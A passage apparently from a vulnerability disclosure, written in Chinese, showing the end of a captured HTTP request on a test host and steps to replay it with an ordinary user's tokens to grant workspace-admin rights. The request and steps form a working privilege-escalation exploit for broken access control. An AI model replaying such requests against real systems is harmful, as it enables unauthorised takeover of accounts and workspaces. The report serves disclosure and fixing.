    Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
    Connection: close
    
    {"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
    

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

**Impact**

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。

Tag

#apple